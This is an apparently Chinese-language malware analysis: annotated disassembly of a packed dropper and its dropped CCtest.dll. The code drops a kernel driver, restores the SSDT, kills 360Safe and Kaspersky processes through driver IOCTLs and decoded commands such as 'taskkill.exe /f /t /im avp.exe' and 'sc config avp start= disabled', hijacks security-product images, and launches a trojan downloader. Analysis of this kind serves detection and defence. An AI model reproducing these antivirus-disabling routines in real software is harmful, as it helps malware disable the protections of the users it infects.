.Upack:0041E9AE jz FailRet ; 释放文件失败跳走
.Upack:0041E9B4 lea eax, [ebp+SysName]
.Upack:0041E9BA push eax ; lpFileName
.Upack:0041E9BB call ReleaseSysFile ; 释放文件"c:\progra~1\\RAV\CCtest.Sys"
.Upack:0041E9C0 test al, al
.Upack:0041E9C2 pop ecx
.Upack:0041E9C3 jz FailRet ; 释放文件失败跳走
加载驱动
.Upack:0041E9CF push offset PropertyBuffer ; "*CCTestDevice"
.Upack:0041E9D4 push eax ; InfName
.Upack:0041E9D5 call LoadDriver ; 加载驱动
.Upack:0041E9DA push 3E8h
.Upack:0041E9DF call __Sleep
.Upack:0041E9E4 push ebx ; MemberIndex
.Upack:0041E9E5 push offset InterfaceClassGuid ; InterfaceClassGuid
.Upack:0041E9EA call EunuInterface ; 获取驱动句柄
.Upack:0041E9EF mov esi, eax
.Upack:0041E9F1 add esp, 14h
.Upack:0041E9F4 cmp esi, ebx
.Upack:0041E9F6 jnz short loc_41EA1A ; 成功跳走
加载CCtest.dll,并调用testall函数:ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
.Upack:0041EA66 pop ecx
.Upack:0041EA67 ; loc_41EA67
.Upack:0041EA70
.Upack:0041EA70 loc_41EA70: ; CODE XREF: KillSafeSoft+781j
.Upack:0041EA70 push 723EB0D5h
.Upack:0041EA75 push 1
.Upack:0041EA77 call __GetProcessAddressByHashValue ; 获取CloseHandle函数地址
.Upack:0041EA7C push esi
.Upack:0041EA7D call eax ; CloseHandle
.Upack:0041EA7F lea eax, [ebp+InfName]
.Upack:0041EA85 push eax ; InfName
.Upack:0041EA86 call UnloadDriver ; 卸载驱动
.Upack:0041EA8B lea eax, [ebp+InfName]
.Upack:0041EA91 push eax
.Upack:0041EA92 call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041EA97 lea eax, [ebp+SysName]
.Upack:0041EA9D push eax
.Upack:0041EA9E call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.sys"
.Upack:0041EAA3 lea eax, [ebp+lpSubKey]
.Upack:0041EAA9 push eax
.Upack:0041EAAA push 80000002h
.Upack:0041EAAF call __RegDeleteKeyA
.Upack:0041EAB4 push ebx
.Upack:0041EAB5 lea eax, [ebp+szCMDStop]
.Upack:0041EAB8 push ebx
.Upack:0041EAB9 push eax
.Upack:0041EABA push offset aSc ; "sc"
.Upack:0041EABF push offset aOpen ; "open"
.Upack:0041EAC4 push ebx
.Upack:0041EAC5 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041EACA push 5DCh
.Upack:0041EACF call __Sleep
.Upack:0041EAD4 add esp, 2Ch
.Upack:0041EAD7
.Upack:0041EAD7 FailRet: ; CODE XREF: KillSafeSoft+6C2j
.Upack:0041EAD7 ; KillSafeSoft+6D7j
.Upack:0041EAD7 xor eax, eax
.Upack:0041EAD9
.Upack:0041EAD9 Ret: ; CODE XREF: KillSafeSoft+729j
.Upack:0041EAD9 pop edi
.Upack:0041EADA pop esi
.Upack:0041EADB pop ebx
.Upack:0041EADC leave
.Upack:0041EADD retn
.Upack:0041EADD KillSafeSoft endp
之后就是清理现场了,删除释放的文件
.Upack:0041EA1A loc_41EA1A: ; CODE XREF: KillSafeSoft+70Aj
.Upack:0041EA1A lea eax, [ebp+DllName]
.Upack:0041EA20 push eax ; lpFileName
.Upack:0041EA21 call ReleaseDllFile ; 释放文件"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA26 test al, al
.Upack:0041EA28 pop ecx
.Upack:0041EA29 jz short loc_41EA67 ; 释放文件失败跳走
.Upack:0041EA2B lea eax, [ebp+DllName]
.Upack:0041EA31 push eax ; lpLibFileName
.Upack:0041EA32 call LoadLibraryA ; 加载释放的文件"c:\progra~1\\RAV\CCtest.dll
.Upack:0041EA38 mov edi, eax
.Upack:0041EA3A lea eax, [ebp+testall]
.Upack:0041EA3D push eax ; lpProcName
.Upack:0041EA3E push edi ; hModule
.Upack:0041EA3F call GetProcAddress ; 获"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA3F ; 的testall函数地址
.Upack:0041EA45 push esi ; hDevice
.Upack:0041EA46 call eax ; 调用testall,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA48 push 0BB8h
.Upack:0041EA4D call __Sleep
.Upack:0041EA52 pop ecx
.Upack:0041EA53 push edi ; hLibModule
.Upack:0041EA54 call FreeLibrary
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
回到主函数
做掉安全软件之后,就释放一个随机文件名的文件,开始下载大量木马
.Upack:0041ED92 lea eax, [ebp+szRandTempFileName]
.Upack:0041ED98 push eax ; lpBuffer
.Upack:0041ED99 push esi ; nBufferLength
.Upack:0041ED9A call GetTempPathA
.Upack:0041EDA0 ; .Upack:0041EDA0
.Upack:0041EDA9 nop
.Upack:0041EDAA
.Upack:0041EDAA loc_41EDAA: ; CODE XREF: start+2C9j
.Upack:0041EDAA call __GetTickCount ; 获取系统滴答数,以产生随机数
.Upack:0041EDAF 构建随机临时文件
.Upack:0041EDAF push eax
.Upack:0041EDB0 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDB6 push eax
.Upack:0041EDB7 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDBD push offset aScdD_exe ; "%scd%d.exe"
.Upack:0041EDC2 push eax ; LPSTR
.Upack:0041EDC3 call wsprintfA
.Upack:0041EDC9 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDCF push eax ; lpszRandTempFileName
.Upack:0041EDD0 call ReleaseRandomTempFile ; 临时目录释放随机生成文件名的文件
.Upack:0041EDD5 nop
.Upack:0041EDD6 push ebx
.Upack:0041EDD7 push ebx
.Upack:0041EDD8 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDDE push offset lpParameters
.Upack:0041EDE3 push eax
.Upack:0041EDE4 push 41CB18h
.Upack:0041EDE9 push ebx
.Upack:0041EDEA call __ShellExecuteA ; 运行随机生成文件名的文件,开始下载木马了
释放文件tmpacik.tmp并加载,调用killhy来做掉还原软件
.Upack:0041EE78 loc_41EE78: ; CODE XREF: start+397j
.Upack:0041EE78 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE7E push eax ; lpFileName
.Upack:0041EE7F call ReleaseFile ; 系统目录下释放文件"tmpacik.tmp"
.Upack:0041EE84 test al, al
.Upack:0041EE86 pop ecx
.Upack:0041EE87 jz short loc_41EEE4 ; 释放文件失败跳走
.Upack:0041EE89 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE8F push eax ; lpLibFileName
.Upack:0041EE90 call LoadLibraryA ; 加载释放的文件"C:\windows\system32\tmpacik.tmp"
.Upack:0041EE96 ; .Upack:0041EE96
.Upack:0041EE9F lea ecx, [ebp+killhy]
.Upack:0041EEA2 push ecx ; lpProcName
.Upack:0041EEA3
.Upack:0041EEA3 loc_41EEA3: ; CODE XREF: start+3BEj
.Upack:0041EEA3 push eax ; hModule
.Upack:0041EEA4 call GetProcAddress ; 获取killhy函数地址
.Upack:0041EEAA ; .Upack:0041EEAA
.Upack:0041EEB3
.Upack:0041EEB3 loc_41EEB3: ; CODE XREF: start+3D2
母体文件分析完毕
***********************************释放的文件CCtest.dll分析************************************
模块初始化时提升进程权限
.text:100027E0 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:100027E0 ; DllMain of the dropped CCtest.dll. fdwReason is declared but never tested,
.text:100027E0 ; so the privilege adjustment and the module-path lookup below run on every
.text:100027E0 ; attach/detach notification, not only on DLL_PROCESS_ATTACH.
.text:100027E0 ; Return: eax = 1 (TRUE) unconditionally; stdcall with three args (retn 0Ch).
.text:100027E0 ; Side effect: fills the global lpszDllModuleFileName with this DLL's own path.
.text:100027E0 ; Detection note: GetModuleFileNameA is resolved by import hash (774393E8h, the same
.text:100027E0 ; constant the packed parent pushes at 0041EC0E), so it is absent from the import table.
.text:100027E0 public DllEntryPoint
.text:100027E0 DllEntryPoint proc near
.text:100027E0
.text:100027E0 hinstDLL = dword ptr 4
.text:100027E0 fdwReason = dword ptr 8 ; unused
.text:100027E0 lpReserved = dword ptr 0Ch ; unused
.text:100027E0
.text:100027E0 call __AdjustTokenPrivilege ; body not shown here; per the author's note it raises the host process's token privileges at load time
.text:100027E5 push 774393E8h ; import hash of GetModuleFileNameA
.text:100027EA push 1
.text:100027EC call GetProcAddressByHashValue ; eax = GetModuleFileNameA, resolved by walking kernel32's export names
.text:100027F1 push 0FFh ; nSize = 255 bytes
.text:100027F6 push offset lpszDllModuleFileName ; lpFilename (global buffer)
.text:100027FB mov ecx, [esp+8+hinstDLL] ; hModule = hinstDLL (+8 accounts for the two pushes above)
.text:100027FF push ecx
.text:10002800 call eax ; GetModuleFileNameA
.text:10002802 mov eax, 1 ; TRUE
.text:10002807 retn 0Ch
.text:10002807 DllEntryPoint endp
CCtest.dll的testall接口分析
.text:10002670 ; void sub_10002670(HANDLE hDriver) -- worker reached from the exported testall (see XREF)
.text:10002670 ; Caller-cleaned (plain retn); hDriver is the CCtest.sys device handle and is kept
.text:10002670 ; in esi (callee-saved) across every call below. Sequence:
.text:10002670 ;   1. build "shell32.dll" / "ShellExecuteA" on the stack, resolve and cache lpfnShellExecute
.text:10002670 ;   2. ReSSDT(hDriver)          -- author: restore the SSDT from ring0
.text:10002670 ;   3. Kill360Safe(hDriver)     -- skipped when an "ekrn.exe" process exists
.text:10002670 ;   4. KillAvp, KillSafeSoft(hDriver), ImageExecuteFile(hDriver)
.text:10002670 ; Sleep is re-resolved by hash 3D9972F5h before each call. No meaningful return value:
.text:10002670 ; eax holds whatever the final Sleep left.
.text:10002670 ; Detection notes: neither "shell32.dll" nor "ShellExecuteA" exists as a contiguous
.text:10002670 ; string in the binary (stack-built byte by byte), and the push eax / nop / pop eax
.text:10002670 ; filler recurs in this DLL (compare the KillAvp and Kill360Safe epilogues).
.text:10002670 sub_10002670 proc near ; CODE XREF: testall+Ep
.text:10002670
.text:10002670 szShellExecute = byte ptr -1Ch ; 14-byte stack string "ShellExecuteA",0
.text:10002670 szShell32_dll = byte ptr -0Ch ; 12-byte stack string "shell32.dll",0
.text:10002670 hDriver = dword ptr 8
.text:10002670
.text:10002670 push ebp
.text:10002671 mov ebp, esp
.text:10002673 sub esp, 1Ch
.text:10002676 mov al, 'l' ; al='l', cl='e', dl=0 are reused to fill repeated bytes of both strings
.text:10002678 push esi
.text:10002679 mov [ebp+szShellExecute+3], al
.text:1000267C mov [ebp+szShellExecute+4], al
.text:1000267F mov [ebp+szShell32_dll+3], al
.text:10002682 mov [ebp+szShell32_dll+4], al
.text:10002685 mov [ebp+szShell32_dll+9], al
.text:10002688 mov [ebp+szShell32_dll+0Ah], al
.text:1000268B lea eax, [ebp+szShell32_dll]
.text:1000268E mov cl, 'e'
.text:10002690 xor dl, dl
.text:10002692 push eax ; lpLibFileName = szShell32_dll (still being written below, completed before the call)
.text:10002693 mov [ebp+szShellExecute], 'S'
.text:10002697 mov [ebp+szShellExecute+1], 'h'
.text:1000269B mov [ebp+szShellExecute+2], cl
.text:1000269E mov [ebp+szShellExecute+5], 'E'
.text:100026A2 mov [ebp+szShellExecute+6], 'x'
.text:100026A6 mov [ebp+szShellExecute+7], cl
.text:100026A9 mov [ebp+szShellExecute+8], 'c'
.text:100026AD mov [ebp+szShellExecute+9], 'u'
.text:100026B1 mov [ebp+szShellExecute+0Ah], 't'
.text:100026B5 mov [ebp+szShellExecute+0Bh], cl
.text:100026B8 mov [ebp+szShellExecute+0Ch], 'A'
.text:100026BC mov [ebp+szShellExecute+0Dh], dl ; NUL -> "ShellExecuteA"
.text:100026BF mov [ebp+szShell32_dll], 's'
.text:100026C3 mov [ebp+szShell32_dll+1], 'h'
.text:100026C7 mov [ebp+szShell32_dll+2], cl
.text:100026CA mov [ebp+szShell32_dll+5], '3'
.text:100026CE mov [ebp+szShell32_dll+6], '2'
.text:100026D2 mov [ebp+szShell32_dll+7], '.'
.text:100026D6 mov [ebp+szShell32_dll+8], 'd'
.text:100026DA mov [ebp+szShell32_dll+0Bh], dl ; NUL -> "shell32.dll"
.text:100026DD call LoadLibraryA
.text:100026E3 nop
.text:100026E4 lea ecx, [ebp+szShellExecute]
.text:100026E7 push ecx ; lpProcName = "ShellExecuteA"
.text:100026E8 push eax ; hModule = shell32.dll
.text:100026E9 call GetProcAddress
.text:100026EF mov lpfnShellExecute, eax ; global; KillAvp later calls it to run sc / taskkill
.text:100026F4 ; .text:100026F4
.text:100026FC mov esi, [ebp+hDriver] ; esi = hDriver for the rest of the function
.text:100026FF push esi
.text:10002700
.text:10002700 loc_10002700: ; CODE XREF: sub_10002670+89j
.text:10002700 call ReSSDT ; ReSSDT(hDriver): SSDT restore done in ring0 through the driver (body shown separately)
.text:10002705 add esp, 4
.text:10002708 push eax ; push/nop/nop/pop: net no-op filler
.text:10002709 nop
.text:1000270A nop
.text:1000270B pop eax
.text:1000270C push 3D9972F5h ; import hash of Sleep
.text:10002711 push 1
.text:10002713 call GetProcAddressByHashValue ; eax = Sleep
.text:10002718 push 1000 ; dwMilliseconds
.text:1000271D call eax ; Sleep
.text:1000271F push eax ; filler again
.text:10002720 nop
.text:10002721 nop
.text:10002722 pop eax
.text:10002723 push offset String2 ; "hnuq1h{h"
.text:10002728 call DecryString ; -> "ekrn.exe". Every encoded/decoded pair on this page differs by exactly 3 per byte ('h'->'e', '1'->'.', '{'->'x', '#'->' '), i.e. a byte-wise subtract-3 decode; useful for a static string extractor
.text:1000272D push eax ; lpString1 = process name to look for
.text:1000272E call GetProcessId ; walks the process list; returns the PID or 0
.text:10002733 add esp, 8
.text:10002736 test eax, eax
.text:10002738 jnz short loc_10002756 ; "ekrn.exe" present: skip Kill360Safe
.text:1000273A push esi ; hDriver
.text:1000273B call Kill360Safe ; terminates 360tray.exe / Zhudongfangyu.exe via DeviceIoControl on hDriver
.text:10002740 add esp, 4
.text:10002743 push 3D9972F5h ; import hash of Sleep
.text:10002748 push 1
.text:1000274A call GetProcAddressByHashValue ; eax = Sleep
.text:1000274F push 1000 ; dwMilliseconds
.text:10002754 call eax ; Sleep
.text:10002756 ; loc_10002756
.text:10002762
.text:10002762 loc_10002762: ; CODE XREF: sub_10002670+EBj
.text:10002762 call KillAvp ; Kaspersky: unload its .kdl modules, then
.text:10002762 ; run "taskkill.exe /f /t /im avp.exe" through lpfnShellExecute
.text:10002767 ; .text:10002767
.text:1000276B push 3D9972F5h ; import hash of Sleep
.text:10002770 push 1
.text:10002772 call GetProcAddressByHashValue ; eax = Sleep
.text:10002777 push 1000 ; dwMilliseconds
.text:1000277C call eax ; Sleep
.text:1000277E ; .text:1000277E
.text:10002782 push esi ; hDriver
.text:10002783 call KillSafeSoft ; walks the process list and kills a long list of security-product processes
.text:10002788 ; .text:10002788
.text:10002790 push esi ; hDriver
.text:10002791
.text:10002791 loc_10002791: ; CODE XREF: sub_10002670+11Dj
.text:10002791 call ImageExecuteFile ; ring0 image hijack of security-product process names via the driver
.text:10002796 add esp, 4
.text:10002799 push 3D9972F5h ; import hash of Sleep
.text:1000279E push 1
.text:100027A0 call GetProcAddressByHashValue ; eax = Sleep
.text:100027A5 push 3E8h ; 1000 ms
.text:100027AA call eax ; Sleep
.text:100027AC pop esi
.text:100027AD mov esp, ebp
.text:100027AF pop ebp
.text:100027B0 retn ; caller removes hDriver
.text:100027B0 sub_10002670 endp ; sp-analysis failed -- likely due to the push/nop/pop filler and the collapsed ranges above
.text:100027B0
.text:100027B0 ; ---------------------------------------------------------------------------
.text:100027B1 align 10h
.text:100027C0 ; Exported entry 1. testall
进入call ReSSDT看看,其call主要功能是恢复SSDT
调用NtQuerySystemInformation的0Bh号功能(SystemModuleInformation)获取当前内核模块的基址与内核模块名
.text:1000186F 获取系统模块
.text:1000186F mov esi, eax
.text:10001871 nop
.text:10001872 mov ecx, [ebp+pModules]
.text:10001875 lea eax, [ebp+dwNeededSize]
.text:10001878 push eax ; ReturnLength
.text:10001879 push 4 ; SystemInformationLength
.text:1000187B push ecx ; SystemInformation
.text:1000187C push 0Bh ; SystemModuleInformation
.text:1000187E call esi ; NtQuerySystemInformation
.text:10001880 nop
.text:10001881 cmp eax, 0C0000004h
.text:10001886 jnz Ret ; 失败跳走
.text:1000188C mov edx, [ebp+dwNeededSize]
.text:1000188F push edx ; dwBytes
.text:10001890 push 40h ; uFlags
.text:10001892 call GlobalAlloc
.text:10001898 mov ecx, [ebp+dwNeededSize]
.text:1000189B push edi
.text:1000189C push ecx
.text:1000189D push eax
.text:1000189E push 0Bh
.text:100018A0 mov [ebp+pModules], eax
.text:100018A3 call esi ; NtQuerySystemInformation
.text:100018A5 test eax, eax
.text:100018A7 jl Ret ; 失败跳走
.text:100018AD mov eax, [ebp+pModules]
.text:100018B0 xor ecx, ecx
.text:100018B2 mov cx, [eax+MODULES.smi.ModuleNameOffset]
.text:100018B6 mov edx, [eax+MODULES.smi.Base]
.text:100018B9 mov [ebp+hKernelBase], edx
.text:100018BC lea eax, [ecx+eax+MODULES.smi.ImageName] ; 得到内核模块名
在用户进程中加载一个内核副本,在该副本中搜索并得到KeServiceDescriptorTable的RVA
.text:100018C1 push 1 ; dwFlags
.text:100018C3 push edi ; hFile
.text:100018C4 push eax ; lpLibFileName
.text:100018C5 call LoadLibraryExA ; 加载内核副本
.text:100018CB mov esi, eax
.text:100018CD test esi, esi
.text:100018CF mov [ebp+hKernel], esi
.text:100018D2 jz Ret
.text:100018D8 nop
.text:100018D9 mov edx, [ebp+pModules]
.text:100018DC push edx ; hMem
.text:100018DD call GlobalFree
.text:100018E3 push offset ProcName ; "KeServiceDescriptorTable"
.text:100018E8 push esi ; hModule
.text:100018E9 call ebx ; GetProcAddress
.text:100018EB test eax, eax
.text:100018ED jz short Ret ; 失败跳走
.text:100018EF sub eax, esi ; 得到KeServiceDescriptorTable RAV地址
.text:100018F1 push eax
.text:100018F2 push esi
.text:100018F3 call FindKiServiceTable
通过内核副本的原始数据发送控制码恢复SSDT
.text:1000192B mov ebx, [eax]
.text:1000192D mov edx, [ebp+hKernelBase]
.text:10001930 sub ecx, ebx
.text:10001932 lea eax, [ebp+ulAddr]
.text:10001935 add ecx, edx
.text:10001937 push eax ; pulAddr
.text:10001938 mov [ebp+ulAddr], ecx
.text:1000193B mov ecx, [ebp+hDriver]
.text:1000193E push edi ; dwServices
.text:1000193F push ecx ; hDriver
.text:10001940 call SetProc ; 除了Hash值获取函数地址其他的
.text:10001940 ; 都是COPY来的一字未改的代码
.text:10001945 mov edx, [ebp+poh]
.text:10001948 mov ecx, [esi+4]
.text:1000194B add esi, 4
.text:1000194E mov ebx, ecx
.text:10001950 sub ebx, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001953 lea eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001956 add esp, 0Ch
.text:10001959 inc edi
.text:1000195A cmp ebx, [edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
.text:1000195D jb short loc_1000192B
.text:1000195F
进入call Kill360Safe看看
下面的废话不多说,建立进程快照遍历进程获取360tray.exe与Zhudongfangyu.exe的进程ID,并把进程ID通过调用DeviceIoControl来结束安全软件进程
.text:100024C8 mov [ebp+sz360tray_exe], '3' ; 生成字符串"360tray.exe"
.text:100024CC mov [ebp+sz360tray_exe+1], '6'
.text:100024D0 mov [ebp+sz360tray_exe+2], '0'
.text:100024D4 mov [ebp+sz360tray_exe+3], 't'
.text:100024D8 mov [ebp+sz360tray_exe+4], 'r'
.text:100024DC mov [ebp+sz360tray_exe+5], 'a'
.text:100024E0 mov [ebp+sz360tray_exe+6], 'y'
.text:100024E4 mov [ebp+sz360tray_exe+7], '.'
.text:100024E8 mov [ebp+sz360tray_exe+8], al
.text:100024EB mov [ebp+sz360tray_exe+9], 'x'
.text:100024EF mov [ebp+sz360tray_exe+0Ah], al
.text:100024F2 mov [ebp+sz360tray_exe+0Bh], 0
.text:100024F6 mov [ebp+szZhudongfangyu_exe], 'z' ; 生成字符串"Zhudongfangyu.exe"
.text:100024FA mov [ebp+szZhudongfangyu_exe+1], 'h'
.text:100024FE mov [ebp+szZhudongfangyu_exe+2], bl
.text:10002501 mov [ebp+szZhudongfangyu_exe+3], 'd'
.text:10002505 mov [ebp+szZhudongfangyu_exe+4], 'o'
.text:10002509 mov [ebp+szZhudongfangyu_exe+5], dl
.text:1000250C mov [ebp+szZhudongfangyu_exe+6], cl
.text:1000250F mov [ebp+szZhudongfangyu_exe+7], 'f'
.text:10002513 mov [ebp+szZhudongfangyu_exe+8], 'a'
.text:10002517 mov [ebp+szZhudongfangyu_exe+9], dl
.text:1000251A mov [ebp+szZhudongfangyu_exe+0Ah], cl
.text:1000251D mov [ebp+szZhudongfangyu_exe+0Bh], 'y'
.text:10002521 mov [ebp+szZhudongfangyu_exe+0Ch], bl
.text:10002524 mov [ebp+szZhudongfangyu_exe+0Dh], '.'
.text:10002528 mov [ebp+szZhudongfangyu_exe+0Eh], al
.text:1000252B mov [ebp+szZhudongfangyu_exe+0Fh], 'x'
.text:1000252F mov [ebp+szZhudongfangyu_exe+10h], al
.text:10002532 mov [ebp+szZhudongfangyu_exe+11h], 0
.text:10002536 call CreateToolhelp32Snapshot
.text:1000253B mov esi, eax
.text:1000253D mov [ebp+pe.dwSize], 128h
.text:10002547 push eax
.text:10002548 nop
.text:10002549 pop eax
.text:1000254A lea eax, [ebp+pe]
.text:10002550 push eax ; lppe
.text:10002551 push esi ; hSnapshot
.text:10002552 call Process32First
.text:10002557 test eax, eax
.text:10002559 jz short loc_100025C4
.text:1000255B mov edi, [ebp+arg_0]
.text:1000255E mov ebx, lstrcmpiA
.text:10002564
.text:10002564 loc_10002564: ; CODE XREF: Kill360Safe+112j
.text:10002564 lea ecx, [ebp+sz360tray_exe]
.text:10002567 lea edx, [ebp+pe.szExeFile]
.text:1000256D push ecx ; lpString2
.text:1000256E push edx ; lpString1
.text:1000256F call ebx ; lstrcmpiA ; 比较是否"360tray.exe"进程
.text:10002571 test eax, eax
.text:10002573 jz short loc_10002586
.text:10002575 lea eax, [ebp+szZhudongfangyu_exe]
.text:10002578 lea ecx, [ebp+pe.szExeFile]
.text:1000257E push eax ; lpString2
.text:1000257F push ecx ; lpString1
.text:10002580 call ebx ; lstrcmpiA ; 比较是否"Zhudongfangyu.exe"进程
.text:10002582 test eax, eax
.text:10002584 jnz short GotoNext
.text:10002586
.text:10002586 loc_10002586: ; CODE XREF: Kill360Safe+C3j
.text:10002586 mov edx, [ebp+pe.th32ProcessID]
.text:1000258C push 82E8173h
.text:10002591 push 1
.text:10002593 mov [ebp+dwProcessID], edx
.text:10002596 call GetProcAddressByHashValue
.text:1000259B 发送控制码结束进程
.text:1000259B lea ecx, [ebp+BytesReturned]
.text:1000259E push 0
.text:100025A0 push ecx
.text:100025A1 push 0
.text:100025A3 push 0
.text:100025A5 lea edx, [ebp+dwProcessID]
.text:100025A8 push 4
.text:100025AA push edx
.text:100025AB push 222004h
.text:100025B0 push edi
.text:100025B1 call eax ; DeviceIoControl
.text:100025B3
.text:100025B3 GotoNext: ; CODE XREF: Kill360Safe+D4j
.text:100025B3 lea eax, [ebp+pe]
.text:100025B9 push eax ; lppe
.text:100025BA push esi ; hSnapshot
.text:100025BB call Process32Next
.text:100025C0 test eax, eax
.text:100025C2 jnz short loc_10002564
.text:100025C4
.text:100025C4 loc_100025C4: ; CODE XREF: Kill360Safe+A9j
.text:100025C4 push 723EB0D5h
.text:100025C9 push 1
.text:100025CB call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100025D0 push esi
.text:100025D1 call eax ; CloseHandle
.text:100025D3 push eax
.text:100025D4 nop
.text:100025D5 pop eax
.text:100025D6 pop edi
.text:100025D7 pop esi
.text:100025D8 xor eax, eax
.text:100025DA pop ebx
.text:100025DB mov esp, ebp
.text:100025DD pop ebp
.text:100025DE retn
.text:100025DE Kill360Safe endp
再进入call KillAvp看看
1.建立进程快照遍历进程获取进程AVP.EXE的进程ID,并禁用卡巴服务
2.建立卡巴的模块快照再次遍历AVP的模块,并卸载卡巴的以下模块:
kavbase.kdl
klavemu.kdl
webav.kdl
kjim.kdl
vlns.kdl
mark.kdl
3.最后通过 ShellExecute 执行 "taskkill.exe /f /t /im avp.exe" 强制结束 avp.exe 及其子进程树做掉卡巴（不是批处理文件；"taskkill.exe" 和参数字符串都是运行时由 DecryString 解密得到的，推测是为了躲避静态字符串检测，这一点本身也可作为检测特征）
.text:10002280 call CreateToolhelp32Snapshot
.text:10002285 mov edi, eax
.text:10002287 lea eax, [ebp+pe]
.text:1000228D push eax ; lppe
.text:1000228E push edi ; hSnapshot
.text:1000228F mov [ebp+pe.dwSize], 128h
.text:10002299 call Process32First
.text:1000229E test eax, eax
.text:100022A0 jz loc_100023E9
.text:100022A6 mov ebx, lstrcmpiA
.text:100022AC mov esi, lstrcpyA
.text:100022B2
.text:100022B2 loc_100022B2: ; CODE XREF: KillAvp+2C3j
.text:100022B2 push offset aDys1hH ; "dys1h{h"
.text:100022B7 call DecryString ; 解码后"avp.exe"
.text:100022BC add esp, 4
.text:100022BF lea ecx, [ebp+pe.szExeFile]
.text:100022C5 push eax ; lpString2
.text:100022C6 push ecx ; lpString1
.text:100022C7 call ebx ; lstrcmpiA ; 比较是否"avp.exe"进程
.text:100022C9 test eax, eax
.text:100022CB jnz loc_100023D4 ; 未找到"avp.exe"进程跳走
.text:100022D1 nop
.text:100022D2 push eax
.text:100022D3 push eax
.text:100022D4 lea edx, [ebp+szCMDDisabledAvpService]
.text:100022D7 lea eax, [ebp+SC]
.text:100022DA push edx ; "config avp start= disabled"
.text:100022DB push eax ; "sc"
.text:100022DC push 0
.text:100022DE push 0
.text:100022E0 call lpfnShellExecute ; 禁用卡巴服务
.text:100022E6 push 3D9972F5h
.text:100022EB push 1
.text:100022ED call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100022F2 push 2500
.text:100022F7 call eax ; Sleep
.text:100022F9 nop
.text:100022FA mov edx, [ebp+pe.th32ProcessID]
.text:10002300 lea ecx, [ebp+szKavbase_kdl]
.text:10002303 push ecx ; lpszModuleName
.text:10002304 push edx ; dwProcessId
.text:10002305 call UnloadModule ; 卸载模块
.text:1000230A nop
.text:1000230B mov ecx, [ebp+pe.th32ProcessID]
.text:10002311 lea eax, [ebp+szWebav_kdl]
.text:10002314 push eax ; lpszModuleName
.text:10002315 push ecx ; dwProcessId
.text:10002316 call UnloadModule
.text:1000231B nop
.text:1000231C mov eax, [ebp+pe.th32ProcessID]
.text:10002322 lea edx, [ebp+szVlns_kdl]
.text:10002325 push edx ; lpszModuleName
.text:10002326 push eax ; dwProcessId
.text:10002327 call UnloadModule
.text:1000232C nop
.text:1000232D mov edx, [ebp+pe.th32ProcessID]
.text:10002333 lea ecx, [ebp+szMark_kdl]
.text:10002336 push ecx ; lpszModuleName
.text:10002337 push edx ; dwProcessId
.text:10002338 call UnloadModule
.text:1000233D nop
.text:1000233E mov ecx, [ebp+pe.th32ProcessID]
.text:10002344 lea eax, [ebp+szKlavemu_kdl]
.text:10002347 push eax ; lpszModuleName
.text:10002348 push ecx ; dwProcessId
.text:10002349 call UnloadModule
.text:1000234E nop
.text:1000234F mov eax, [ebp+pe.th32ProcessID]
.text:10002355 lea edx, [ebp+szKjim_kdl]
.text:10002358 push edx ; lpszModuleName
.text:10002359 push eax ; dwProcessId
.text:1000235A call UnloadModule
.text:1000235F add esp, 30h
.text:10002362 push 3D9972F5h
.text:10002367 push 1
.text:10002369 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000236E push 1000
.text:10002373 call eax ; Sleep
.text:10002375 nop
.text:10002376 push offset aWdvnnloo1hH ; "wdvnnloo1h{h"
.text:1000237B call DecryString ; 解密后字符"taskkill.exe"
.text:10002380 add esp, 4
.text:10002383 lea ecx, [ebp+szProcTaskkill_exe]
.text:10002389 push eax ; lpString2
.text:1000238A push ecx ; lpString1
.text:1000238B call esi ; lstrcpyA
.text:1000238D push offset a2i2w2lpDys1hH ; "2i#2w#2lp#dys1h{h"
.text:10002392 call DecryString ; 解密后字符串"/f /t /im avp.exe"
.text:10002397 add esp, 4
.text:1000239A lea edx, [ebp+lpCMDKillAvp]
.text:100023A0 push eax ; lpString2
.text:100023A1 push edx ; lpString1
.text:100023A2 call esi ; lstrcpyA
.text:100023A4 push 0
.text:100023A6 lea eax, [ebp+lpCMDKillAvp]
.text:100023AC push 0
.text:100023AE lea ecx, [ebp+szProcTaskkill_exe]
.text:100023B4 push eax ; "/f /t /im avp.exe"
.text:100023B5 push ecx ; "taskkill.exe"
.text:100023B6 push 0
.text:100023B8 push 0
.text:100023BA call lpfnShellExecute ; 一个处理做掉卡巴
.text:100023C0 push 3D9972F5h
.text:100023C5 push 1
.text:100023C7 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100023CC push 4500
.text:100023D1 call eax ; Sleep
.text:100023D3 nop
.text:100023D4
.text:100023D4 loc_100023D4: ; CODE XREF: KillAvp+1ABj
.text:100023D4 lea edx, [ebp+pe]
.text:100023DA push edx ; lppe
.text:100023DB push edi ; hSnapshot
.text:100023DC call Process32Next
.text:100023E1 test eax, eax
.text:100023E3 jnz loc_100022B2
.text:100023E9
.text:100023E9 loc_100023E9: ; CODE XREF: KillAvp+180j
.text:100023E9 push 723EB0D5h
.text:100023EE push 1
